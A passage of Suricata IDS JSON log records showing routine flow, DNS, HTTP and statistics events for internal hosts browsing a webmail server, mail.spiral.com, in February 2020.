segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2768,"new_pruned":15,"est_pruned":2400,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} {"timestamp":"2020-02-29T00:15:35.000636+0000","flow_id":1080320319612926,"event_type":"flow","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":12,"bytes_toserver":1533,"bytes_toclient":9963,"start":"2020-02-29T00:14:28.518142+0000","end":"2020-02-29T00:14:34.691080+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:36.000855+0000","flow_id":1681976502983035,"event_type":"flow","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:35.072059+0000","end":"2020-02-29T00:10:35.180346+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:40.000158+0000","event_type":"stats","stats":{"uptime":14592,"capture":{"kernel_packets":135976,"kernel_drops":0},"decoder":{"pkts":135977,"bytes":93568300,"invalid":188,"ipv4":134466,"ipv6":8,"ethernet":135977,"raw":0,"null":0,"sll":0,"tcp":129101,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2769,"new_pruned":15,"est_pruned":2401,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23801,"memcap_state":0,"memcap_global":0},"http":{"memuse":46574,"memcap":0}}} {"timestamp":"2020-02-29T00:15:40.002310+0000","flow_id":54888288126643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:14:34.689843+0000","end":"2020-02-29T00:14:39.874407+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:41.000176+0000","flow_id":1207756279237984,"event_type":"flow","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.249184+0000","end":"2020-02-29T00:10:39.357577+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:41.000427+0000","flow_id":2107843985516552,"event_type":"flow","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.436232+0000","end":"2020-02-29T00:10:39.544428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.000587+0000","flow_id":2049496855059110,"event_type":"flow","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:43.170662+0000","end":"2020-02-29T00:10:43.278991+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.873520+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56447,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:45.143410+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760}} {"timestamp":"2020-02-29T00:15:46.000610+0000","flow_id":1209336842897935,"event_type":"flow","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1089,"bytes_toclient":7728,"start":"2020-02-29T00:14:39.936463+0000","end":"2020-02-29T00:14:45.180132+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:47.000223+0000","event_type":"stats","stats":{"uptime":14599,"capture":{"kernel_packets":135984,"kernel_drops":0},"decoder":{"pkts":135995,"bytes":93577219,"invalid":188,"ipv4":134484,"ipv6":8,"ethernet":135995,"raw":0,"null":0,"sll":0,"tcp":129117,"udp":5164,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2789,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2805,"synack":2796,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1828,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2361,"failed_udp":112},"tx":{"http":4692,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2441}},"flow_mgr":{"closed_pruned":2770,"new_pruned":15,"est_pruned":2404,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23141,"memcap_state":0,"memcap_global":0},"http":{"memuse":98271,"memcap":0}}} {"timestamp":"2020-02-29T00:15:49.000673+0000","flow_id":1084958869762291,"event_type":"flow","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:47.995571+0000","end":"2020-02-29T00:10:48.103585+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000287+0000","flow_id":1715253910491618,"event_type":"flow","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:48.905698+0000","end":"2020-02-29T00:10:49.013601+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000649+0000","flow_id":1095949691237231,"event_type":"flow","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.242543+0000","end":"2020-02-29T00:10:49.351235+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000730+0000","flow_id":1940791233185635,"event_type":"flow","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.100195+0000","end":"2020-02-29T00:10:49.208618+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.144599+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34844,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33149,"tx_id":0}} {"timestamp":"2020-02-29T00:15:50.221676+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24645,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:50.404112+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753}} {"timestamp":"2020-02-29T00:15:51.000352+0000","flow_id":1428599203355264,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.1","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:10:50.449152+0000","end":"2020-02-29T00:10:50.451079+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:52.000623+0000","flow_id":1918758066486106,"event_type":"flow","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4820,"start":"2020-02-29T00:14:46.031578+0000","end":"2020-02-29T00:14:51.218164+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:52.475712+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42047,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:15:54.000393+0000","event_type":"stats","stats":{"uptime":14606,"capture":{"kernel_packets":136002,"kernel_drops":0},"decoder":{"pkts":136021,"bytes":93587551,"invalid":188,"ipv4":134506,"ipv6":8,"ethernet":136021,"raw":0,"null":0,"sll":0,"tcp":129137,"udp":5166,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2790,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2806,"synack":2797,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1829,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2362,"failed_udp":112},"tx":{"http":4693,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2442}},"flow_mgr":{"closed_pruned":2771,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":4,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65528,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":92914,"memcap":0}}} {"timestamp":"2020-02-29T00:15:55.000509+0000","flow_id":30355435553035,"event_type":"flow","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2866,"bytes_toclient":7700,"start":"2020-02-29T00:14:44.196875+0000","end":"2020-02-29T00:14:54.542150+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:55.405021+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34846,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":26692,"tx_id":0}} {"timestamp":"2020-02-29T00:15:57.624359+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34848,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":96,"tx_id":0}} {"timestamp":"2020-02-29T00:16:01.000196+0000","event_type":"stats","stats":{"uptime":14613,"capture":{"kernel_packets":136038,"kernel_drops":0},"decoder":{"pkts":136039,"bytes":93589986,"invalid":188,"ipv4":134524,"ipv6":8,"ethernet":136039,"raw":0,"null":0,"sll":0,"tcp":129153,"udp":5168,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2791,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2807,"synack":2798,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1830,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2363,"failed_udp":112},"tx":{"http":4694,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2443}},"flow_mgr":{"closed_pruned":2773,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":24177,"memcap":0}}} {"timestamp":"2020-02-29T00:16:03.000121+0000","flow_id":1847126602345263,"event_type":"flow","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":24,"pkts_toclient":25,"bytes_toserver":2616,"bytes_toclient":28174,"start":"2020-02-29T00:14:52.715567+0000","end":"2020-02-29T00:15:01.606362+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:03.979541+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15141,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:04.218436+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820}} {"timestamp":"2020-02-29T00:16:08.000247+0000","event_type":"stats","stats":{"uptime":14620,"capture":{"kernel_packets":136044,"kernel_drops":0},"decoder":{"pkts":136059,"bytes":93601097,"invalid":188,"ipv4":134544,"ipv6":8,"ethernet":136059,"raw":0,"null":0,"sll":0,"tcp":129171,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2774,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22809,"memcap_state":0,"memcap_global":0},"http":{"memuse":109686,"memcap":0}}} {"timestamp":"2020-02-29T00:16:09.219329+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36778,"tx_id":0}} {"timestamp":"2020-02-29T00:16:10.000881+0000","flow_id":512302305152088,"event_type":"flow","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":2179,"bytes_toclient":9824,"start":"2020-02-29T00:14:34.691288+0000","end":"2020-02-29T00:15:09.176468+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 